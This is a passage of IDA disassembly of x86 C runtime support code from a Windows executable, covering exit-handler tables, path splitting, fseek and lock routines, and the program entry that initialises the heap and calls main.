loc_41B2E2: ; CODE XREF: sub_41B2D0+A�j
push offset dword_434014
push offset dword_434008
call sub_41B4A0
add esp, 8
push offset dword_434004
push offset dword_434000
call sub_41B4A0
add esp, 8
pop ebp
retn
sub_41B2D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B310 proc near ; CODE XREF: sub_41B970+12D�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0
push 0
mov eax, [ebp+arg_0]
push eax
call sub_41B390
add esp, 0Ch
pop ebp
retn
sub_41B310 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B330 proc near ; CODE XREF: .text:0041BAC4�p
; sub_41BAE0+22�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0
push 1
mov eax, [ebp+arg_0]
push eax
call sub_41B390
add esp, 0Ch
pop ebp
retn
sub_41B330 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push 1
push 0
push 0
call sub_41B390
add esp, 0Ch
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push 1
push 1
push 0
call sub_41B390
add esp, 0Ch
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B390 proc near ; CODE XREF: sub_41B310+B�p
; sub_41B330+B�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
call sub_41B480
cmp dword_4920D0, 1
jnz short loc_41B3B3
mov eax, [ebp+arg_0]
push eax
call ds:dword_494290
push eax
call ds:dword_4943B8
loc_41B3B3: ; CODE XREF: sub_41B390+10�j
mov dword_4920CC, 1
mov cl, byte ptr [ebp+arg_8]
mov byte_4920C8, cl
cmp [ebp+arg_4], 0
jnz short loc_41B413
cmp dword_493794, 0
jz short loc_41B401
mov edx, dword_493790
mov [ebp+var_4], edx
loc_41B3DE: ; CODE XREF: sub_41B390:loc_41B3FF�j
mov eax, [ebp+var_4]
sub eax, 4
mov [ebp+var_4], eax
mov ecx, [ebp+var_4]
cmp ecx, dword_493794
jb short loc_41B401
mov edx, [ebp+var_4]
cmp dword ptr [edx], 0
jz short loc_41B3FF
mov eax, [ebp+var_4]
call dword ptr [eax]
loc_41B3FF: ; CODE XREF: sub_41B390+68�j
jmp short loc_41B3DE
; ---------------------------------------------------------------------------
loc_41B401: ; CODE XREF: sub_41B390+43�j
; sub_41B390+60�j
push offset dword_434020
push offset dword_434018
call sub_41B4A0
add esp, 8
loc_41B413: ; CODE XREF: sub_41B390+3A�j
push offset dword_434028
push offset dword_434024
call sub_41B4A0
add esp, 8
cmp dword_4920D4, 0
jnz short loc_41B44E
push 0FFFFFFFFh
call sub_417F40
add esp, 4
and eax, 20h
test eax, eax
jz short loc_41B44E
mov dword_4920D4, 1
call sub_418850
loc_41B44E: ; CODE XREF: sub_41B390+9C�j
; sub_41B390+AD�j
cmp [ebp+arg_8], 0
jz short loc_41B45B
call sub_41B490
jmp short loc_41B46F
; ---------------------------------------------------------------------------
loc_41B45B: ; CODE XREF: sub_41B390+C2�j
mov dword_4920D0, 1
mov ecx, [ebp+arg_0]
push ecx
call ds:dword_49432C
loc_41B46F: ; CODE XREF: sub_41B390+C9�j
mov esp, ebp
pop ebp
retn
sub_41B390 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B480 proc near ; CODE XREF: sub_41B390+4�p
push ebp
mov ebp, esp
push 0Dh
call sub_41BC90
add esp, 4
pop ebp
retn
sub_41B480 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B490 proc near ; CODE XREF: sub_41B390+C4�p
push ebp
mov ebp, esp
push 0Dh
call sub_41BD30
add esp, 4
pop ebp
retn
sub_41B490 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B4A0 proc near ; CODE XREF: sub_41B2D0+1C�p
; sub_41B2D0+2E�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
loc_41B4A3: ; CODE XREF: sub_41B4A0+21�j
mov eax, [ebp+arg_0]
cmp eax, [ebp+arg_4]
jnb short loc_41B4C3
mov ecx, [ebp+arg_0]
cmp dword ptr [ecx], 0
jz short loc_41B4B8
mov edx, [ebp+arg_0]
call dword ptr [edx]
loc_41B4B8: ; CODE XREF: sub_41B4A0+11�j
mov eax, [ebp+arg_0]
add eax, 4
mov [ebp+arg_0], eax
jmp short loc_41B4A3
; ---------------------------------------------------------------------------
loc_41B4C3: ; CODE XREF: sub_41B4A0+9�j
pop ebp
retn
sub_41B4A0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B4D0 proc near ; CODE XREF: sub_40BBCB+FA�p
; sub_40C50A+5434�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 20h
mov [ebp+var_C], 0
mov [ebp+var_8], 0
mov eax, [ebp+arg_0]
push eax
call sub_418E70
add esp, 4
cmp eax, 1
jb short loc_41B52B
mov ecx, [ebp+arg_0]
movsx edx, byte ptr [ecx+1]
cmp edx, 3Ah
jnz short loc_41B52B
cmp [ebp+arg_4], 0
jz short loc_41B520
push 2
mov eax, [ebp+arg_0]
push eax
mov ecx, [ebp+arg_4]
push ecx
call sub_4249D0
add esp, 0Ch
mov edx, [ebp+arg_4]
mov byte ptr [edx+2], 0
loc_41B520: ; CODE XREF: sub_41B4D0+35�j
mov eax, [ebp+arg_0]
add eax, 2
mov [ebp+arg_0], eax
jmp short loc_41B537
; ---------------------------------------------------------------------------
loc_41B52B: ; CODE XREF: sub_41B4D0+23�j
; sub_41B4D0+2F�j
cmp [ebp+arg_4], 0
jz short loc_41B537
mov ecx, [ebp+arg_4]
mov byte ptr [ecx], 0
loc_41B537: ; CODE XREF: sub_41B4D0+59�j
; sub_41B4D0+5F�j
mov [ebp+var_C], 0
mov edx, [ebp+arg_0]
mov [ebp+var_4], edx
jmp short loc_41B54F
; ---------------------------------------------------------------------------
loc_41B546: ; CODE XREF: sub_41B4D0:loc_41B5AC�j
mov eax, [ebp+var_4]
add eax, 1
mov [ebp+var_4], eax
loc_41B54F: ; CODE XREF: sub_41B4D0+74�j
mov ecx, [ebp+var_4]
movsx edx, byte ptr [ecx]
test edx, edx
jz short loc_41B5AE
mov eax, [ebp+var_4]
xor ecx, ecx
mov cl, [eax]
xor edx, edx
mov dl, byte_492641[ecx]
and edx, 4
test edx, edx
jz short loc_41B57A
mov eax, [ebp+var_4]
add eax, 1
mov [ebp+var_4], eax
jmp short loc_41B5AC
; ---------------------------------------------------------------------------
loc_41B57A: ; CODE XREF: sub_41B4D0+9D�j
mov ecx, [ebp+var_4]
movsx edx, byte ptr [ecx]
cmp edx, 2Fh
jz short loc_41B590
mov eax, [ebp+var_4]
movsx ecx, byte ptr [eax]
cmp ecx, 5Ch
jnz short loc_41B59B
loc_41B590: ; CODE XREF: sub_41B4D0+B3�j
mov edx, [ebp+var_4]
add edx, 1
mov [ebp+var_C], edx
jmp short loc_41B5AC
; ---------------------------------------------------------------------------
loc_41B59B: ; CODE XREF: sub_41B4D0+BE�j
mov eax, [ebp+var_4]
movsx ecx, byte ptr [eax]
cmp ecx, 2Eh
jnz short loc_41B5AC
mov edx, [ebp+var_4]
mov [ebp+var_8], edx
loc_41B5AC: ; CODE XREF: sub_41B4D0+A8�j
; sub_41B4D0+C9�j ...
jmp short loc_41B546
; ---------------------------------------------------------------------------
loc_41B5AE: ; CODE XREF: sub_41B4D0+87�j
cmp [ebp+var_C], 0
jz short loc_41B604
cmp [ebp+arg_8], 0
jz short loc_41B5FC
mov eax, [ebp+var_C]
sub eax, [ebp+arg_0]
cmp eax, 0FFh
jnb short loc_41B5D2
mov ecx, [ebp+var_C]
sub ecx, [ebp+arg_0]
mov [ebp+var_14], ecx
jmp short loc_41B5D9
; ---------------------------------------------------------------------------
loc_41B5D2: ; CODE XREF: sub_41B4D0+F5�j
mov [ebp+var_14], 0FFh
loc_41B5D9: ; CODE XREF: sub_41B4D0+100�j
mov edx, [ebp+var_14]
mov [ebp+var_10], edx
mov eax, [ebp+var_10]
push eax
mov ecx, [ebp+arg_0]
push ecx
mov edx, [ebp+arg_8]
push edx
call sub_4249D0
add esp, 0Ch
mov eax, [ebp+arg_8]
add eax, [ebp+var_10]
mov byte ptr [eax], 0
loc_41B5FC: ; CODE XREF: sub_41B4D0+E8�j
mov ecx, [ebp+var_C]
mov [ebp+arg_0], ecx
jmp short loc_41B610
; ---------------------------------------------------------------------------
loc_41B604: ; CODE XREF: sub_41B4D0+E2�j
cmp [ebp+arg_8], 0
jz short loc_41B610
mov edx, [ebp+arg_8]
mov byte ptr [edx], 0
loc_41B610: ; CODE XREF: sub_41B4D0+132�j
; sub_41B4D0+138�j
cmp [ebp+var_8], 0
jz loc_41B6BA
mov eax, [ebp+var_8]
cmp eax, [ebp+arg_0]
jb loc_41B6BA
cmp [ebp+arg_C], 0
jz short loc_41B66F
mov ecx, [ebp+var_8]
sub ecx, [ebp+arg_0]
cmp ecx, 0FFh
jnb short loc_41B645
mov edx, [ebp+var_8]
sub edx, [ebp+arg_0]
mov [ebp+var_18], edx
jmp short loc_41B64C
; ---------------------------------------------------------------------------
loc_41B645: ; CODE XREF: sub_41B4D0+168�j
mov [ebp+var_18], 0FFh
loc_41B64C: ; CODE XREF: sub_41B4D0+173�j
mov eax, [ebp+var_18]
mov [ebp+var_10], eax
mov ecx, [ebp+var_10]
push ecx
mov edx, [ebp+arg_0]
push edx
mov eax, [ebp+arg_C]
push eax
call sub_4249D0
add esp, 0Ch
mov ecx, [ebp+arg_C]
add ecx, [ebp+var_10]
mov byte ptr [ecx], 0
loc_41B66F: ; CODE XREF: sub_41B4D0+15A�j
cmp [ebp+arg_10], 0
jz short loc_41B6B8
mov edx, [ebp+var_4]
sub edx, [ebp+var_8]
cmp edx, 0FFh
jnb short loc_41B68E
mov eax, [ebp+var_4]
sub eax, [ebp+var_8]
mov [ebp+var_1C], eax
jmp short loc_41B695
; ---------------------------------------------------------------------------
loc_41B68E: ; CODE XREF: sub_41B4D0+1B1�j
mov [ebp+var_1C], 0FFh
loc_41B695: ; CODE XREF: sub_41B4D0+1BC�j
mov ecx, [ebp+var_1C]
mov [ebp+var_10], ecx
mov edx, [ebp+var_10]
push edx
mov eax, [ebp+var_8]
push eax
mov ecx, [ebp+arg_10]
push ecx
call sub_4249D0
add esp, 0Ch
mov edx, [ebp+arg_10]
add edx, [ebp+var_10]
mov byte ptr [edx], 0
loc_41B6B8: ; CODE XREF: sub_41B4D0+1A3�j
jmp short loc_41B70E
; ---------------------------------------------------------------------------
loc_41B6BA: ; CODE XREF: sub_41B4D0+144�j
; sub_41B4D0+150�j
cmp [ebp+arg_C], 0
jz short loc_41B702
mov eax, [ebp+var_4]
sub eax, [ebp+arg_0]
cmp eax, 0FFh
jnb short loc_41B6D8
mov ecx, [ebp+var_4]
sub ecx, [ebp+arg_0]
mov [ebp+var_20], ecx
jmp short loc_41B6DF
; ---------------------------------------------------------------------------
loc_41B6D8: ; CODE XREF: sub_41B4D0+1FB�j
mov [ebp+var_20], 0FFh
loc_41B6DF: ; CODE XREF: sub_41B4D0+206�j
mov edx, [ebp+var_20]
mov [ebp+var_10], edx
mov eax, [ebp+var_10]
push eax
mov ecx, [ebp+arg_0]
push ecx
mov edx, [ebp+arg_C]
push edx
call sub_4249D0
add esp, 0Ch
mov eax, [ebp+arg_C]
add eax, [ebp+var_10]
mov byte ptr [eax], 0
loc_41B702: ; CODE XREF: sub_41B4D0+1EE�j
cmp [ebp+arg_10], 0
jz short loc_41B70E
mov ecx, [ebp+arg_10]
mov byte ptr [ecx], 0
loc_41B70E: ; CODE XREF: sub_41B4D0:loc_41B6B8�j
; sub_41B4D0+236�j
mov esp, ebp
pop ebp
retn
sub_41B4D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B720 proc near ; CODE XREF: sub_40C50A+2BE0�p
; .text:0041B777�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
push eax
call ds:dword_4943C0
test eax, eax
jnz short loc_41B73D
call ds:dword_4942F0
mov [ebp+var_4], eax
jmp short loc_41B744
; ---------------------------------------------------------------------------
loc_41B73D: ; CODE XREF: sub_41B720+10�j
mov [ebp+var_4], 0
loc_41B744: ; CODE XREF: sub_41B720+1B�j
cmp [ebp+var_4], 0
jz short loc_41B75B
mov ecx, [ebp+var_4]
push ecx
call sub_422E80
add esp, 4
or eax, 0FFFFFFFFh
jmp short loc_41B75D
; ---------------------------------------------------------------------------
loc_41B75B: ; CODE XREF: sub_41B720+28�j
xor eax, eax
loc_41B75D: ; CODE XREF: sub_41B720+39�j
mov esp, ebp
pop ebp
retn
sub_41B720 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
mov eax, [ebp+8]
push eax
call sub_41B720
add esp, 4
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B790 proc near ; CODE XREF: sub_40C50A+84F�p
; sub_415CF4+2AC�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
push ebx
mov ecx, [ebp+arg_8]
jecxz short loc_41B7C1
mov ebx, ecx
mov edi, [ebp+arg_0]
mov esi, edi
xor eax, eax
repne scasb
neg ecx
add ecx, ebx
mov edi, esi
mov esi, [ebp+arg_4]
repe cmpsb
mov al, [esi-1]
xor ecx, ecx
cmp al, [edi-1]
ja short loc_41B7BF
jz short loc_41B7C1
dec ecx
dec ecx
loc_41B7BF: ; CODE XREF: sub_41B790+29�j
not ecx
loc_41B7C1: ; CODE XREF: sub_41B790+9�j
; sub_41B790+2B�j
mov eax, ecx
pop ebx
pop esi
pop edi
leave
retn
sub_41B790 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B7D0 proc near ; CODE XREF: sub_415CF4+2E2�p
; sub_415CF4+435�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
loc_41B7D7: ; CODE XREF: sub_41B7D0+2F�j
cmp [ebp+arg_0], 0
jnz short loc_41B7FB
push offset aStreamNull ; "stream != NULL"
push 0
push 65h
push offset aFseek_c ; "fseek.c"
push 2
call sub_41BF80
add esp, 14h
cmp eax, 1
jnz short loc_41B7FB
int 3 ; Trap to Debugger
loc_41B7FB: ; CODE XREF: sub_41B7D0+B�j
; sub_41B7D0+28�j
xor eax, eax
test eax, eax
jnz short loc_41B7D7
mov ecx, [ebp+arg_0]
push ecx
call sub_421230
add esp, 4
mov edx, [ebp+arg_8]
push edx
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_41B840
add esp, 0Ch
mov [ebp+var_4], eax
mov edx, [ebp+arg_0]
push edx
call sub_4212A0
add esp, 4
mov eax, [ebp+var_4]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_41B7D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B840 proc near ; CODE XREF: sub_41B7D0+49�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
loc_41B847: ; CODE XREF: sub_41B840+32�j
cmp [ebp+arg_0], 0
jnz short loc_41B86E
push offset aStrNull ; "str != NULL"
push 0
push 92h
push offset aFseek_c ; "fseek.c"
push 2
call sub_41BF80
add esp, 14h
cmp eax, 1
jnz short loc_41B86E
int 3 ; Trap to Debugger
loc_41B86E: ; CODE XREF: sub_41B840+B�j
; sub_41B840+2B�j
xor eax, eax
test eax, eax
jnz short loc_41B847
mov ecx, [ebp+arg_0]
mov [ebp+var_4], ecx
mov edx, [ebp+var_4]
mov eax, [edx+0Ch]
and eax, 83h
test eax, eax
jz short loc_41B89B
cmp [ebp+arg_8], 0
jz short loc_41B8AE
cmp [ebp+arg_8], 1
jz short loc_41B8AE
cmp [ebp+arg_8], 2
jz short loc_41B8AE
loc_41B89B: ; CODE XREF: sub_41B840+47�j
call sub_422F20
mov dword ptr [eax], 16h
or eax, 0FFFFFFFFh
jmp loc_41B960
; ---------------------------------------------------------------------------
loc_41B8AE: ; CODE XREF: sub_41B840+4D�j
; sub_41B840+53�j ...
mov ecx, [ebp+var_4]
mov edx, [ecx+0Ch]
and edx, 0FFFFFFEFh
mov eax, [ebp+var_4]
mov [eax+0Ch], edx
cmp [ebp+arg_8], 1
jnz short loc_41B8DE
mov ecx, [ebp+var_4]
push ecx
call sub_424CC0
add esp, 4
mov edx, [ebp+arg_4]
add edx, eax
mov [ebp+arg_4], edx
mov [ebp+arg_8], 0
loc_41B8DE: ; CODE XREF: sub_41B840+81�j
mov eax, [ebp+var_4]
push eax
call sub_421580
add esp, 4
mov ecx, [ebp+var_4]
mov edx, [ecx+0Ch]
and edx, 80h
test edx, edx
jz short loc_41B90B
mov eax, [ebp+var_4]
mov ecx, [eax+0Ch]
and ecx, 0FFFFFFFCh
mov edx, [ebp+var_4]
mov [edx+0Ch], ecx
jmp short loc_41B93F
; ---------------------------------------------------------------------------
loc_41B90B: ; CODE XREF: sub_41B840+B8�j
mov eax, [ebp+var_4]
mov ecx, [eax+0Ch]
and ecx, 1
test ecx, ecx
jz short loc_41B93F
mov edx, [ebp+var_4]
mov eax, [edx+0Ch]
and eax, 8
test eax, eax
jz short loc_41B93F
mov ecx, [ebp+var_4]
mov edx, [ecx+0Ch]
and edx, 400h
test edx, edx
jnz short loc_41B93F
mov eax, [ebp+var_4]
mov dword ptr [eax+18h], 200h
loc_41B93F: ; CODE XREF: sub_41B840+C9�j
; sub_41B840+D6�j ...
mov ecx, [ebp+arg_8]
push ecx
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+var_4]
mov ecx, [eax+10h]
push ecx
call sub_424B00
add esp, 0Ch
sub eax, 0FFFFFFFFh
neg eax
sbb eax, eax
neg eax
dec eax
loc_41B960: ; CODE XREF: sub_41B840+69�j
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_41B840 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B970 proc near ; CODE XREF: sub_495000�j
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = byte ptr -5Ch
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_432C50
push offset sub_425F84
mov eax, large fs:0
push eax
mov large fs:0, esp
add esp, 0FFFFFFA4h
push ebx
push esi
push edi
mov [ebp+var_18], esp
call ds:dword_49442C
mov dword_492094, eax
mov eax, dword_492094
shr eax, 8
and eax, 0FFh
mov dword_4920A0, eax
mov ecx, dword_492094
and ecx, 0FFh
mov dword_49209C, ecx
mov edx, dword_49209C
shl edx, 8
add edx, dword_4920A0
mov dword_492098, edx
mov eax, dword_492094
shr eax, 10h
and eax, 0FFFFh
mov dword_492094, eax
push 1
call sub_41C9C0
add esp, 4
test eax, eax
jnz short loc_41BA04
push 1Ch
call sub_41BB10
add esp, 4
loc_41BA04: ; CODE XREF: sub_41B970+88�j
call sub_41F930
test eax, eax
jnz short loc_41BA17
push 10h
call sub_41BB10
add esp, 4
loc_41BA17: ; CODE XREF: sub_41B970+9B�j
mov [ebp+var_4], 0
call sub_425AC0
call ds:dword_494428
mov dword_493784, eax
call sub_4258A0
mov dword_4920D8, eax
call sub_425390
call sub_425240
call sub_41B2D0
mov [ebp+var_30], 0
lea ecx, [ebp+var_5C]
push ecx
call ds:dword_494424
call sub_425180
mov [ebp+var_64], eax
mov edx, [ebp+var_30]
and edx, 1
test edx, edx
jz short loc_41BA77
mov eax, [ebp+var_2C]
and eax, 0FFFFh
mov [ebp+var_6C], eax
jmp short loc_41BA7E
; ---------------------------------------------------------------------------
loc_41BA77: ; CODE XREF: sub_41B970+F8�j
mov [ebp+var_6C], 0Ah
loc_41BA7E: ; CODE XREF: sub_41B970+105�j
mov ecx, [ebp+var_6C]
push ecx
mov edx, [ebp+var_64]
push edx
push 0
push 0
call ds:dword_494380
push eax
call sub_40BBCB
mov [ebp+var_60], eax
mov eax, [ebp+var_60]
push eax
call sub_41B310
mov ecx, [ebp+var_14]
mov edx, [ecx]
mov eax, [edx]
mov [ebp+var_68], eax
mov ecx, [ebp+var_14]
push ecx
mov edx, [ebp+var_68]
push edx
call sub_424F60
add esp, 8
retn
sub_41B970 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
mov eax, [ebp-68h]
push eax
call sub_41B330
mov ecx, [ebp-10h]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BAE0 proc near ; CODE XREF: sub_41BC90+32�p
; sub_41FA10+7F�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
cmp dword_4920E0, 1
jnz short loc_41BAF1
call sub_426060
loc_41BAF1: ; CODE XREF: sub_41BAE0+A�j
mov eax, [ebp+arg_0]
push eax
call sub_4260B0
add esp, 4
push 0FFh
call off_442C50
add esp, 4
pop ebp
retn
sub_41BAE0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BB10 proc near ; CODE XREF: sub_41B970+8C�p
; sub_41B970+9F�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
cmp dword_4920E0, 1
jnz short loc_41BB21
call sub_426060
loc_41BB21: ; CODE XREF: sub_41BB10+A�j
mov eax, [ebp+arg_0]
push eax
call sub_4260B0
add esp, 4
push 0FFh
call ds:dword_49432C
pop ebp
retn
sub_41BB10 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push ecx
push 9
call sub_41BC90
add esp, 4
mov eax, dword_4920E8
mov [ebp-4], eax
mov ecx, [ebp+8]
mov dword_4920E8, ecx
push 9
call sub_41BD30
add esp, 4
mov eax, [ebp-4]
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
mov eax, dword_4920E8
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BB80 proc near ; CODE XREF: sub_416A80+48�p
; sub_41BD90+41�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov eax, dword_4920E8
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_41BBA0
mov ecx, [ebp+arg_0]
push ecx
call [ebp+var_4]
add esp, 4
test eax, eax
jnz short loc_41BBA4
loc_41BBA0: ; CODE XREF: sub_41BB80+10�j
xor eax, eax
jmp short loc_41BBA9
; ---------------------------------------------------------------------------
loc_41BBA4: ; CODE XREF: sub_41BB80+1E�j
mov eax, 1
loc_41BBA9: ; CODE XREF: sub_41BB80+22�j
mov esp, ebp
pop ebp
retn
sub_41BB80 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BBB0 proc near ; CODE XREF: sub_41F930+4�p
push ebp
mov ebp, esp
mov eax, off_442C9C
push eax
call ds:dword_494430
mov ecx, off_442C8C
push ecx
call ds:dword_494430
mov edx, off_442C7C
push edx
call ds:dword_494430
mov eax, off_442C5C
push eax
call ds:dword_494430
pop ebp
retn
sub_41BBB0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BBF0 proc near ; CODE XREF: .text:0041F9C3�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], 0
jmp short loc_41BC06
; ---------------------------------------------------------------------------
loc_41BBFD: ; CODE XREF: sub_41BBF0:loc_41BC57�j
mov eax, [ebp+var_4]
add eax, 1
mov [ebp+var_4], eax
loc_41BC06: ; CODE XREF: sub_41BBF0+B�j
cmp [ebp+var_4], 30h
jge short loc_41BC59
mov ecx, [ebp+var_4]
cmp dword_442C58[ecx*4], 0
jz short loc_41BC57
cmp [ebp+var_4], 11h
jz short loc_41BC57
cmp [ebp+var_4], 0Dh
jz short loc_41BC57
cmp [ebp+var_4], 9
jz short loc_41BC57
cmp [ebp+var_4], 1
jz short loc_41BC57
mov edx, [ebp+var_4]
mov eax, dword_442C58[edx*4]
push eax
call ds:dword_494310
push 2
mov ecx, [ebp+var_4]
mov edx, dword_442C58[ecx*4]
push edx
call sub_4174C0
add esp, 8
loc_41BC57: ; CODE XREF: sub_41BBF0+27�j
; sub_41BBF0+2D�j ...
jmp short loc_41BBFD
; ---------------------------------------------------------------------------
loc_41BC59: ; CODE XREF: sub_41BBF0+1A�j
mov eax, off_442C7C
push eax
call ds:dword_494310
mov ecx, off_442C8C
push ecx
call ds:dword_494310
mov edx, off_442C9C
push edx
call ds:dword_494310
mov eax, off_442C5C
push eax
call ds:dword_494310
mov esp, ebp
pop ebp
retn
sub_41BBF0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BC90 proc near ; CODE XREF: sub_416A80+6�p
; sub_416EC0+6�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
cmp dword_442C58[eax*4], 0
jnz short loc_41BD12
push 0E1h
push offset aMlock_c ; "mlock.c"
push 2
push 18h
call sub_416A30
add esp, 10h
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_41BCCA
push 11h
call sub_41BAE0
add esp, 4
loc_41BCCA: ; CODE XREF: sub_41BC90+2E�j
push 11h
call sub_41BC90
add esp, 4
mov ecx, [ebp+arg_0]
cmp dword_442C58[ecx*4], 0
jnz short loc_41BCFA
mov edx, [ebp+var_4]
push edx
call ds:dword_494430
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_4]
mov dword_442C58[eax*4], ecx
jmp short loc_41BD08
; ---------------------------------------------------------------------------
loc_41BCFA: ; CODE XREF: sub_41BC90+4F�j
push 2
mov edx, [ebp+var_4]
push edx
call sub_4174C0
add esp, 8
loc_41BD08: ; CODE XREF: sub_41BC90+68�j
push 11h
call sub_41BD30
add esp, 4
loc_41BD12: ; CODE XREF: sub_41BC90+F�j
mov eax, [ebp+arg_0]
mov ecx, dword_442C58[eax*4]
push ecx
call ds:dword_494304
mov esp, ebp
pop ebp
retn
sub_41BC90 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BD30 proc near ; CODE XREF: sub_416A80+2B�p
; sub_416EC0+31�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
mov ecx, dword_442C58[eax*4]
push ecx
call ds:dword_494300
pop ebp
retn
sub_41BD30 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
mov eax, [ebp+8]
push eax
push 0
call ds:dword_494434
push 0FFh
call ds:dword_49432C
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BD70 proc near ; CODE XREF: sub_41C6D0+10�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, dword_4920E4
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_41BD90
add esp, 8
pop ebp
retn
sub_41BD70 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BD90 proc near ; CODE XREF: sub_41BD70+D�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
cmp [ebp+arg_0], 0FFFFFFE0h
jbe short loc_41BD9E
xor eax, eax
jmp short loc_41BDE3
; ---------------------------------------------------------------------------
loc_41BD9E: ; CODE XREF: sub_41BD90+8�j
; sub_41BD90:loc_41BDE1�j
cmp [ebp+arg_0], 0FFFFFFE0h
ja short loc_41BDB5
mov eax, [ebp+arg_0]
push eax
call sub_41BDF0
add esp, 4
mov [ebp+var_4], eax
jmp short loc_41BDBC
; ---------------------------------------------------------------------------
loc_41BDB5: ; CODE XREF: sub_41BD90+12�j
mov [ebp+var_4], 0
loc_41BDBC: ; CODE XREF: sub_41BD90+23�j
cmp [ebp+var_4], 0
jnz short loc_41BDC8
